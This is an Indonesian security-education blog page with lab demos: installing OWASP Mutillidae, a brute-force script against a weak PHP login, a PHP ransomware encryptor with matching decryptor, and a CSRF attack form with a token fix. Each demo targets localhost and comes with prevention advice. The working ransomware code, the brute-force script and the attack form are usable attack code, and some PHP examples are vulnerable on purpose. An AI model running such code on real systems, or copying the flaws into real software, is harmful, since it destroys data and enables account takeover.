Blog Bella Ciao

Vulnerable Web With Mutillidae (instalasi)

Read

1. Pengantar OWASP Mutillidae

OWASP Mutillidae adalah aplikasi web yang sengaja dibuat rentan untuk tujuan pendidikan dan pelatihan keamanan aplikasi web. Dikembangkan sebagai bagian dari Open Web Application Security Project (OWASP), Mutillidae dirancang untuk membantu pengembang, penguji keamanan, dan peneliti keamanan untuk mempelajari dan menguji berbagai jenis kerentanan keamanan aplikasi web.

2. Tujuan dan Manfaat

Pendidikan Keamanan: Memberikan platform bagi individu untuk belajar dan memahami berbagai jenis kerentanan keamanan.
Pengujian Penetrasi: Memungkinkan penguji penetrasi untuk melatih keterampilan mereka dalam lingkungan yang aman dan terkendali.
Pengembangan Keamanan: Membantu pengembang memahami kelemahan dalam aplikasi web dan bagaimana cara mengatasinya.

3. Fitur Utama

Berbagai Jenis Kerentanan: Menyediakan contoh kerentanan umum seperti SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Insecure Direct Object References, dan lain-lain.
Mode Pelatihan dan Tantangan: Menawarkan mode pelatihan untuk belajar serta tantangan untuk menguji pengetahuan dan keterampilan.
Documentasi dan Tutorial: Dilengkapi dengan dokumentasi dan tutorial untuk membantu pengguna memahami dan mengeksploitasi kerentanan.

4. Instalasi dan Konfigurasi

Pastikasn sudah memiliki virtual box dan kali linux
buka browser di kali linux dan download xampp untuk linux
lakukan instalasi, dengan membuka terminal pada file manger > download
ketikkan 'ls -l' untuk mencari data yg ada
masukkan 'sudo chmod +x xampp-linux-x64-8.2.12-0-installer.run', masukan sandi kali
masukkan kembali sudo ./xampp-linux-x64-8.2.12-0-installer.run
instal hingga selesai
nyalakan untuk mysql
buka phpmyadmin tambahkan untuk file mutillidae
buka pada file system > lampp > htdocs > mutillidae > src > includes, open terminal here
buka terminal ketikkan "ls -l" untuk menampilkan file
buka sudo nano database-config.inc
hapus untuk passnya pastikan kososng.
masuk ke localhost/mutillidae, scroll hingga ke bawah hingga bertemu opt out
mutillidae siap di gunakan.

5. Kerentanan yang Dipelajari

Berikut beberapa kerentanan umum yang dapat dipelajari menggunakan Mutillidae:

SQL Injection
- Teknik di mana penyerang dapat menyuntikkan pernyataan SQL jahat ke dalam query database.
- Contoh: Menggunakan input form untuk memasukkan perintah SQL.
Cross-Site Scripting (XSS)
- Kerentanan yang memungkinkan penyerang untuk menyuntikkan skrip jahat ke dalam halaman web yang dilihat oleh pengguna lain.
- Contoh: Menyisipkan kode JavaScript ke dalam input pengguna yang tidak ter-filter.
Cross-Site Request Forgery (CSRF)
- Kerentanan yang memungkinkan penyerang untuk melakukan tindakan yang tidak diinginkan atas nama pengguna yang terautentikasi.
- Contoh: Mengirimkan permintaan berbahaya yang tampak sah dari browser korban.
Insecure Direct Object References (IDOR)
- Kerentanan di mana penyerang dapat mengakses objek yang tidak seharusnya dapat mereka akses dengan memanipulasi parameter dalam URL atau form.
- Contoh: Mengubah ID dalam URL untuk mengakses data milik pengguna lain.

6. Praktik Keamanan Terbaik

Validasi dan Sanitasi Input
- Selalu validasi dan sanitasi input dari pengguna untuk mencegah injeksi.
Penggunaan Parameterized Queries
- Gunakan prepared statements atau parameterized queries untuk menghindari SQL Injection.
Penggunaan Token CSRF
- Implementasikan token CSRF untuk mencegah serangan CSRF.
Akses Kontrol yang Ketat
- Terapkan kontrol akses yang ketat dan pastikan hanya pengguna yang berwenang yang dapat mengakses data tertentu.

Read More Add comment

SERANGAN BRUTE FORCE

By bella sevenia

Read

0 Comments

Apasih Brute Force itu ?

Brute Force adalah sebuah metode serangan di dunia keamanan siber di mana penyerang mencoba untuk menebak kata sandi, kunci enkripsi, atau informasi lainnya dengan mencoba semua kemungkinan kombinasi hingga menemukan yang benar. Istilah ini mengacu pada pendekatan yang kasar dan langsung, dengan mengandalkan kekuatan komputasi untuk mencoba berbagai kombinasi.

Cara Kerja Brute Force :

1. Penyerang Mengumpulkan Informasi: Sebelum memulai serangan, penyerang sering kali mengumpulkan informasi sebanyak mungkin tentang target.

2. Menebak Secara Berurutan: Penyerang menggunakan program khusus untuk mencoba semua kombinasi kata sandi atau kunci enkripsi. Program ini bisa dimulai dari kombinasi yang paling sederhana hingga yang paling kompleks.

3. Penggunaan Script dan Bot: Untuk mempercepat proses, penyerang sering menggunakan script atau bot yang otomatis mencoba ribuan atau bahkan jutaan kombinasi dalam waktu singkat.

Dampak Brute Force :

- Keamanan yang Terancam: Jika serangan berhasil, penyerang dapat mendapatkan akses tidak sah ke akun, data, atau sistem yang dilindungi.

- Kerugian Finansial: Data yang dicuri dapat digunakan untuk penipuan finansial atau dijual di pasar gelap.

- Kerusakan Reputasi: Perusahaan yang diserang dapat kehilangan kepercayaan dari pelanggan dan mitra bisnisnya.

- Downtime Sistem: Serangan brute force dapat menghabiskan sumber daya sistem, menyebabkan penurunan kinerja atau bahkan downtime.

Cara Mencegah Brute Force :

1. Penggunaan Kata Sandi yang Kuat: Menggunakan kata sandi yang panjang, kompleks, dan unik untuk setiap akun dapat membuat serangan brute force menjadi lebih sulit.

2. Membatasi Percobaan Login: Menetapkan batas percobaan login yang gagal sebelum mengunci akun sementara atau secara permanen.

3. Menggunakan CAPTCHA: Mengimplementasikan CAPTCHA untuk memastikan bahwa percobaan login dilakukan oleh manusia, bukan bot.

4. Autentikasi Dua Faktor (2FA): Menambahkan lapisan keamanan tambahan di mana pengguna harus memverifikasi identitas mereka melalui metode lain selain kata sandi.

5. Pemantauan dan Deteksi: Menggunakan sistem pemantauan untuk mendeteksi pola login yang mencurigakan dan merespons secara cepat terhadap potensi serangan.

Dengan langkah-langkah pencegahan yang tepat, resiko serangan brute force dapat diminimalisir, meskipun tidak dapat dihilangkan sepenuhnya.

Demo:

Buat folder brute_force di disk:C
Buat file index.php dan isikan kode berikut:
<?php
session_start();
$users = [
'admin' => 'password123',
'user' => 'userpass'
];
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$username = $_POST['username'];
$password = $_POST['password'];
if (isset($users[$username]) && $users[$username] == $password) {
$_SESSION['username'] = $username;
echo "Login berhasil!";
} else {
echo "Login gagal!";
}
}
?>

<!DOCTYPE html>
<html>
<head>
<title>Login</title>
</head>
<body>
<form method="post" action="">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
</body>
</html>

Simulasi serangan brute force dengan python
Buat file brute_force.py dan isikan kode berikut(untuk httpx, dapat melakukan installasi dengan mengetikan pip install httpx):
import hashlib
import httpx

url = "http://localhost/brute_force/index.php"
username = "admin"
passwords = ["password", "123456", "password123", "admin", "userpass"]

for password in passwords:
# hashed_password = hashlib.md5(password.encode()).hexdigest()
data = {
"username": username,
"password": password
}
response = httpx.post(url, data=data)
if "Login berhasil" in response.text:
print(f"Password ditemukan: {password}")
break
else:
print(f"Percobaan gagal: {password}")

Buka browser dan login dengan user admin/password123 pada url http://localhost/brute_force/index.php

Jalankan serangan brute force pada terminal/cmd (pastikan terinstall python) dengan mengetikkan python brute_force.py

Tambahkan script untuk mencegah serangan brute force
Untuk mencegah serangan brute force pada file PHP Anda, Anda dapat menambahkan beberapa mekanisme untuk membatasi jumlah percobaan login yang dapat dilakukan dalam jangka waktu tertentu. Salah satu cara untuk melakukannya adalah dengan menyimpan informasi tentang percobaan login di sesi atau basis data, dan memblokir atau menunda permintaan setelah sejumlah percobaan yang gagal.
Berikut adalah contoh implementasi sederhana menggunakan sesi PHP untuk membatasi jumlah percobaan login:
<?php
session_start();

// Inisialisasi pengguna dan kata sandi
$users = [
'admin' => 'password123',
'user' => 'userpass'
];

// Maksimal percobaan login
$max_attempts = 5;
// Waktu penguncian dalam detik (misalnya 15 menit)
$lockout_time = 15 * 60;

if (!isset($_SESSION['attempts'])) {
$_SESSION['attempts'] = 0;
}

if (!isset($_SESSION['lockout_time'])) {
$_SESSION['lockout_time'] = 0;
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$current_time = time();

if ($_SESSION['attempts'] >= $max_attempts && $current_time < $_SESSION['lockout_time']) {
echo "Terlalu banyak percobaan login. Coba lagi nanti.";
} else {
$username = $_POST['username'];
$password = $_POST['password'];

if (isset($users[$username]) && $users[$username] == $password) {
$_SESSION['username'] = $username;
$_SESSION['attempts'] = 0;
$_SESSION['lockout_time'] = 0;
echo "Login berhasil!";
} else {
$_SESSION['attempts'] += 1;

if ($_SESSION['attempts'] >= $max_attempts) {
$_SESSION['lockout_time'] = $current_time + $lockout_time;
echo "Terlalu banyak percobaan login. Coba lagi nanti.";
} else {
echo "Login gagal!";
}
}
}
}
?>

<!DOCTYPE html>
<html>
<head>
<title>Login</title>
</head>
<body>
<form method="post" action="">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
</body>
</html>

Meski begitu tetap masih perlu keamanan tambahan, seperti menambahkan
Gunakan Captcha: Menambahkan Captcha pada formulir login dapat membantu memverifikasi bahwa pengguna adalah manusia dan bukan skrip otomatis.
Menggunakan Rate Limiting: Implementasikan rate limiting untuk membatasi jumlah permintaan yang dapat dilakukan oleh alamat IP tertentu dalam jangka waktu tertentu.
Tingkatkan Keamanan dengan IP Blocking: Blokir alamat IP yang mencurigakan atau yang melakukan terlalu banyak percobaan login gagal.

TERIMA KASIH !!

Read More Add comment

MARI KITA MENCOBA CHALLENGE RANSOMWARE !

By bella sevenia

Read

0 Comments

1. Apa itu Ransomeware?

Sebelum kita mencoba challenge Ransomware kita harus tau apa sih runsomware itu ?

Ransomware adalah jenis perangkat lunak berbahaya (malware) yang dirancang untuk mengenkripsi data atau mengunci akses ke sistem korban. Penyerang kemudian meminta tebusan (ransom) kepada korban agar mereka dapat mendapatkan kunci dekripsi atau akses kembali ke data mereka. Ini adalah serangan yang serius dan dapat menyebabkan kerugian besar bagi individu maupun organisasi yang terkena dampaknya.

Saya akan memberikan beberapa demo ransomware untuk teman - teman :

Contohnya seperti ini : xampp - htdocs - ransomware - target folder.

Lalu teman - teman aktifkan xampp dan buka folder tersebut di VS Code, lalu buat file diluar target folder dengan nama encrypt,php. Lalu masukan codingan ini :

<?php
 // Generate key
 $key = base64_encode(openssl_random_pseudo_bytes(32));
 // Simpan kunci ke file (untuk dekripsi nantinya)
 file_put_contents('key.txt', $key);
 // Fungsi untuk mengenkripsi file
 function encryptFile($file, $key) {
 $data = file_get_contents($file);
 $method = 'aes-256-cbc';
 $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
 $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
 $encrypted .= '::' . base64_encode($iv);
 file_put_contents($file, $encrypted);
 }
 // Tentukan folder yang akan dienkripsi
 $folder = './target_folder';
 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
 foreach ($files as $file) {
 if ($file->isFile()) {
 encryptFile($file->getRealPath(), $key);
 }
 }
 echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
 ?>

Masukan juga contoh file atau gambar pada folder bernama target_folder contohnya seperti ini :

Jika semua sudah di masukan sesuai perintah, lalu run file codingan yang ada, dan buka di chrome atau google, maka tampilannya akan menjadi seperti ini : filenya terkunci dan tidak bisa di buka.

Dan pada folder tampilannya akan menjadi seperti ini :

Namun untuk lebih lanjutnya :

2. Sejarah Ransomware

Ransomware pertama kali muncul pada akhir tahun 1980-an. Berikut adalah beberapa tonggak sejarah penting dalam perkembangan ransomware:

1989: AIDS Trojan (PC Cyborg): Ransomware pertama yang diketahui, juga dikenal sebagai AIDS Trojan atau PC Cyborg, disebarkan melalui disket. Malware ini akan menyembunyikan file direktori dan mengenkripsi nama file pada drive C:, kemudian menuntut pembayaran sebesar $189 kepada PC Cyborg Corporation.
2005-2006: Ransomware modern: Jenis ransomware modern mulai muncul, menggunakan enkripsi yang lebih canggih dan metode distribusi yang lebih luas, seperti melalui email atau situs web yang terinfeksi.
2013: CryptoLocker: Salah satu ransomware paling terkenal yang menyebar melalui lampiran email berbahaya. CryptoLocker menggunakan enkripsi RSA dan menuntut pembayaran dalam Bitcoin.
2017: WannaCry: Ransomware ini menyebar secara global dan mempengaruhi ratusan ribu komputer dalam hitungan hari. WannaCry memanfaatkan kerentanan dalam sistem operasi Windows yang dikenal sebagai EternalBlue, yang dieksploitasi oleh kelompok hacker Shadow Brokers.
2020-an: Evolusi dan peningkatan serangan: Ransomware terus berkembang dengan teknik baru, termasuk model Ransomware-as-a-Service (RaaS), di mana penjahat siber menjual atau menyewakan ransomware mereka kepada pihak ketiga.

3. Dampak Ransomware

Dampak dari serangan ransomware dapat sangat merugikan, baik dari segi finansial maupun operasional. Berikut adalah beberapa dampak utama dari serangan ransomware:

Kerugian Finansial: Pembayaran tebusan seringkali sangat mahal, dan biaya pemulihan data yang terinfeksi juga dapat mencapai jutaan dolar.
Gangguan Operasional: Sistem yang terinfeksi mungkin tidak dapat digunakan hingga data dipulihkan, menyebabkan gangguan besar pada operasi bisnis atau layanan publik.
Kehilangan Data: Jika data tidak dapat dipulihkan, perusahaan atau individu mungkin kehilangan data penting secara permanen.
Kerusakan Reputasi: Serangan ransomware dapat merusak reputasi perusahaan atau organisasi, menurunkan kepercayaan pelanggan atau publik.
Implikasi Hukum: Ada kemungkinan adanya konsekuensi hukum jika data pribadi atau sensitif terungkap dalam serangan ransomware.

4. Pencegahan Ransomware

Mencegah serangan ransomware membutuhkan pendekatan berlapis yang melibatkan teknologi, pelatihan, dan kebijakan keamanan. Berikut adalah beberapa langkah pencegahan yang dapat diambil:

Backup Data Secara Rutin: Pastikan untuk melakukan backup data secara teratur dan menyimpan salinan backup di lokasi yang terpisah dari jaringan utama.
Update dan Patch Sistem: Selalu perbarui perangkat lunak dan sistem operasi dengan patch terbaru untuk mengurangi kerentanan yang dapat dieksploitasi.
Gunakan Antivirus dan Antimalware: Instal dan perbarui perangkat lunak antivirus dan antimalware untuk mendeteksi dan memblokir malware sebelum infeksi terjadi.
Pelatihan Keamanan: Edukasi karyawan atau pengguna tentang bahaya phishing dan praktik keamanan siber yang baik, termasuk cara mengenali email atau situs web yang mencurigakan.
Segmentasi Jaringan: Batasi akses antar bagian jaringan untuk mencegah penyebaran ransomware jika terjadi infeksi.
Aktifkan Firewall dan IPS/IDS: Gunakan firewall dan sistem deteksi/pencegahan intrusi untuk memonitor dan memblokir aktivitas mencurigakan.
Aktifkan Enkripsi Data: Enkripsi data penting untuk mengurangi dampak jika data dicuri atau dienkripsi oleh ransomware.

Demo:

Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder
Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
Buat file encrypt.php dan isikan kode berikut:

<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));

// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);

// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
    $data = file_get_contents($file);
    $method = 'aes-256-cbc';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
    $encrypted .= '::' . base64_encode($iv);
    file_put_contents($file, $encrypted);
}

// Tentukan folder yang akan dienkripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        encryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>

Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php
Cek folder target_folder dan buka isi filenya
Folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan ransomware

Bentuk mitigasi yang bisa dilakukan

Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:

<?php
// Load the key from the file
$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file
function decryptFile($file, $key) {
    $data = file_get_contents($file);
    list($encrypted_data, $iv) = explode('::', $data, 2);
    $method = 'aes-256-cbc';
    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));
    file_put_contents($file, $decrypted);
}

// Tentukan folder yang akan didekripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        decryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah didekripsi.";
?>

Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php

Dan lihat kembali di folder target_folder

File yang semula terkunci, kini sudah bisa terbuka kembali.

Pencegahan Pasca Serangan Ransomware

Setelah mengalami serangan ransomware, ada beberapa langkah penting yang dapat diambil untuk meminimalkan kerusakan lebih lanjut dan mencegah serangan serupa di masa depan. Berikut adalah panduan pencegahan pasca serangan ransomware:

1. Isolasi dan Kontrol Kerusakan

Isolasi Sistem yang Terinfeksi: Segera isolasi komputer atau sistem yang terinfeksi dari jaringan utama untuk mencegah penyebaran ransomware ke perangkat lain.
Matikan Jaringan: Jika perlu, matikan jaringan secara keseluruhan untuk menghentikan penyebaran ransomware hingga situasi terkendali.

2. Identifikasi dan Hapus Ransomware

Identifikasi Jenis Ransomware: Gunakan alat dan layanan yang tersedia untuk mengidentifikasi jenis ransomware yang menyerang sistem Anda. Ini akan membantu menentukan langkah-langkah pemulihan yang tepat.
Hapus Ransomware: Gunakan perangkat lunak antivirus dan antimalware untuk membersihkan sistem dari ransomware. Pastikan semua salinan ransomware telah dihapus sebelum mencoba memulihkan data.

3. Pemulihan Data

Gunakan Backup: Jika Anda memiliki cadangan data, gunakan backup tersebut untuk memulihkan data yang terinfeksi. Pastikan backup tersebut tidak terinfeksi sebelum digunakan.
Alat Dekripsi: Cari alat dekripsi yang mungkin tersedia untuk jenis ransomware tertentu. Beberapa organisasi keamanan siber menyediakan alat dekripsi gratis untuk ransomware yang sudah dikenal.

4. Laporkan Insiden

Lapor ke Pihak Berwenang: Laporkan insiden ransomware kepada pihak berwenang, seperti lembaga penegak hukum atau badan keamanan siber nasional. Ini dapat membantu dalam investigasi dan penanggulangan kejahatan siber.
Lapor ke Regulator: Jika serangan ransomware melibatkan data pribadi atau sensitif, laporkan insiden tersebut kepada regulator yang relevan, seperti komisi perlindungan data.

5. Evaluasi dan Pembelajaran

Analisis Forensik: Lakukan analisis forensik untuk memahami bagaimana serangan terjadi, jalur infeksi, dan kerentanan yang dieksploitasi.
Evaluasi Proses Keamanan: Tinjau kembali kebijakan dan prosedur keamanan siber yang ada. Identifikasi kelemahan dan buat perbaikan yang diperlukan untuk mencegah serangan serupa di masa depan.

6. Tingkatkan Keamanan

Pembaruan dan Patch: Pastikan semua perangkat lunak, sistem operasi, dan aplikasi diperbarui dengan patch keamanan terbaru.
Pelatihan Karyawan: Tingkatkan program pelatihan keamanan siber untuk karyawan, termasuk cara mengenali dan merespons ancaman phishing dan malware.
Implementasi Keamanan Berlapis: Terapkan pendekatan keamanan berlapis yang mencakup firewall, sistem deteksi dan pencegahan intrusi (IDS/IPS), serta solusi keamanan endpoint.
Segregasi Jaringan: Segmentasi jaringan untuk membatasi akses antar bagian jaringan dan mencegah penyebaran malware.

7. Kebijakan dan Prosedur Baru

Rencana Respons Insiden: Kembangkan atau perbarui rencana respons insiden untuk memastikan tindakan cepat dan efektif jika terjadi serangan ransomware di masa depan.
Kebijakan Backup: Pastikan kebijakan backup yang kuat dengan jadwal backup rutin dan verifikasi integritas data backup.
Kebijakan Akses: Tinjau kembali kebijakan akses untuk memastikan hanya individu yang memiliki hak akses yang diperlukan untuk data dan sistem tertentu.

Read More Add comment

DEMO SERANGAN CSRF YUK !!

By bella sevenia

Read

0 Comments

Cross-Site Request Forgery (CSRF) adalah salah satu jenis serangan web yang memungkinkan penyerang untuk memaksa pengguna melakukan tindakan yang tidak diinginkan pada aplikasi web di mana mereka telah diautentikasi. Artikel ini akan menjelaskan bagaimana menambahkan perlindungan terhadap serangan CSRF dengan menggunakan token CSRF pada aplikasi web.

Cara Kerja CSRF pada Pengguna yang Login:

Pengguna Login: Pengguna login ke situs web A dan mendapatkan cookie sesi yang sah.
Penyerang Menyiapkan Serangan: Penyerang membuat halaman web berbahaya atau email dengan permintaan berbahaya ke situs web A.
Pengguna Terkena Serangan: Pengguna mengakses halaman web berbahaya atau membuka email dengan permintaan berbahaya.
Permintaan Tidak Sah Dikirim: Karena pengguna masih login, permintaan berbahaya dikirim ke server A menggunakan cookie sesi pengguna, sehingga terlihat sah.

Sebelum Update: Script Rentan Terhadap Serangan CSRF

Berikut adalah contoh formulir transfer uang yang rentan terhadap serangan CSRF:

index.html

<!DOCTYPE html>
<html>
  <body>
    <h2>Transfer Uang</h2>
    <form action="transfer.php" method="POST">
      <label for="amount">Jumlah:</label><br />
      <input type="text" id="amount" name="amount" /><br />
      <label for="to">Kepada:</label><br />
      <input type="text" id="to" name="to" /><br /><br />
      <input
        type="hidden"
        name="csrf_token"
        value="<?php echo generateToken(); ?>"
      />
      <input type="submit" value="Transfer" />
    </form>
  </body>
</html>

transfer.php

<?php
session_start();
// Proses transfer (tanpa perlindungan CSRF)
$amount = $_POST['amount'];
$to = $_POST['to'];
echo "Transferred $amount to $to";
?>

Pada contoh di atas, tidak ada perlindungan terhadap serangan CSRF. Penyerang dapat membuat formulir yang mengirimkan permintaan POST ke `transfer.php` tanpa sepengetahuan pengguna.

Hasil user

Contoh Serangan CSRF

Berikut adalah contoh script yang dapat digunakan oleh penyerang untuk mengeksploitasi kelemahan CSRF pada aplikasi:

csrf_attack.html:

<!DOCTYPE html>
<html>
  <body>
    <h2>CSRF Attack</h2>
    <form action="http://localhost/csrf/transfer.php" method="POST">
      <input type="hidden" name="amount" value="1000" />
      <input type="hidden" name="to" value="attacker_account" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

Hasil attacker

Sesudah Update: Script Terlindungi dari Serangan CSRF

Untuk melindungi aplikasi web dari serangan CSRF, kita dapat menambahkan token CSRF pada formulir dan memverifikasinya di sisi server.

1. Mengubah `index.html` menjadi `index.php`:

Karena `index.html` adalah file HTML statis, kita perlu mengubahnya menjadi file PHP untuk bisa menghasilkan token CSRF dinamis.

<?php
session_start();

function generateToken() {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
?>

<!DOCTYPE html>
<html>
<body>
  <h2>Transfer Uang</h2>
  <form action="transfer.php" method="POST">
    <label for="amount">Jumlah:</label><br />
    <input type="text" id="amount" name="amount" /><br />
    <label for="to">Kepada:</label><br />
    <input type="text" id="to" name="to" /><br /><br />
    <input type="hidden" name="csrf_token" value="<?php echo generateToken(); ?>" />
    <input type="submit" value="Transfer" />
  </form>
</body>
</html>

2. Memastikan Token CSRF Diterima dan Diverifikasi di `transfer.php`:

<?php
session_start();

function generateToken() {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function verifyToken($token) {
    return $token === $_SESSION['csrf_token'];
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!isset($_POST['csrf_token']) || !verifyToken($_POST['csrf_token'])) {
        die('Invalid CSRF token');
    }

    // Proses transfer
    $amount = $_POST['amount'];
    $to = $_POST['to'];
    // Lakukan logika transfer di sini
    echo "The account has been verified and the transfer was successfully made to $to an amount of $amount.";
} else {
    die('Invalid request method');
}
?>

3. Memastikan Permintaan POST Terkirim dengan Token yang Benar:

Pastikan bahwa Anda mengakses file `index.php` melalui server lokal Anda, misalnya `http://localhost/csrf/index.php`, bukan `index.html`.

4. Memastikan Tidak Ada Cache yang Mengganggu:

Bersihkan cache browser atau gunakan mode incognito untuk memastikan tidak ada cache yang mengganggu proses pengiriman token CSRF.

Dengan langkah-langkah di atas, token CSRF seharusnya dihasilkan dan diverifikasi dengan benar, sehingga menghindari kesalahan "Invalid CSRF token". Pastikan juga bahwa session bekerja dengan baik dan tidak ada konflik di server lokal Anda.

Hasil user

Hasil attacker

Dampak dari Serangan CSRF

Serangan CSRF memungkinkan penyerang untuk membuat pengguna yang sah melakukan tindakan yang tidak diinginkan tanpa sepengetahuan mereka. Dampak dari serangan ini dapat sangat merugikan, termasuk:

Transaksi Finansial Tidak Sah:
- Penyerang dapat memaksa pengguna untuk melakukan transfer uang atau pembelian online tanpa sepengetahuan pengguna.
Pengubahan Informasi Akun:
- Informasi pribadi pengguna, seperti alamat email, kata sandi, atau preferensi akun, dapat diubah oleh penyerang.
Penyalahgunaan Hak Istimewa:
- Pengguna dengan hak administratif dapat dipaksa untuk membuat perubahan kritis pada sistem atau menambahkan pengguna dengan hak istimewa tinggi.
Pencurian Identitas:
- Informasi pribadi dan kredensial pengguna dapat disalahgunakan untuk berbagai bentuk penipuan dan pencurian identitas.
Kerugian Reputasi:
- Serangan CSRF pada aplikasi web yang dikelola dapat merusak reputasi bisnis dan mengurangi kepercayaan pengguna.

Kesimpulan

Menambahkan perlindungan CSRF pada aplikasi web sangat penting untuk menghindari tindakan tidak sah yang dapat membahayakan pengguna dan integritas aplikasi. Dengan menggunakan token CSRF, kita dapat memastikan bahwa setiap permintaan POST yang diterima oleh server adalah sah dan berasal dari sumber yang valid.

Selalu pastikan untuk menerapkan praktik keamanan terbaik dalam pengembangan aplikasi web untuk melindungi pengguna dan data mereka.

Read More Add comment

Langganan: Postingan ( Atom )

Blog Bella Ciao

Latest Posts

Vulnerable Web With Mutillidae (instalasi)

1. Pengantar OWASP Mutillidae

2. Tujuan dan Manfaat

3. Fitur Utama

5. Kerentanan yang Dipelajari

6. Praktik Keamanan Terbaik

SERANGAN BRUTE FORCE

Demo:

MARI KITA MENCOBA CHALLENGE RANSOMWARE !

2. Sejarah Ransomware

3. Dampak Ransomware

4. Pencegahan Ransomware

Pencegahan Pasca Serangan Ransomware

1. Isolasi dan Kontrol Kerusakan

2. Identifikasi dan Hapus Ransomware

3. Pemulihan Data

4. Laporkan Insiden

5. Evaluasi dan Pembelajaran

6. Tingkatkan Keamanan

7. Kebijakan dan Prosedur Baru

DEMO SERANGAN CSRF YUK !!

Hasil user

Contoh Serangan CSRF

Dampak dari Serangan CSRF

Recent Posts

Facebook

Laporkan Penyalahgunaan

Mengenai Saya

Vulnerable Web With Mutillidae (instalasi)

Cari Blog Ini

Arsip Blog

Post Top Ad

Author Details

Popular Posts

Pages

About Me

Socialize

Facebook

Popular Posts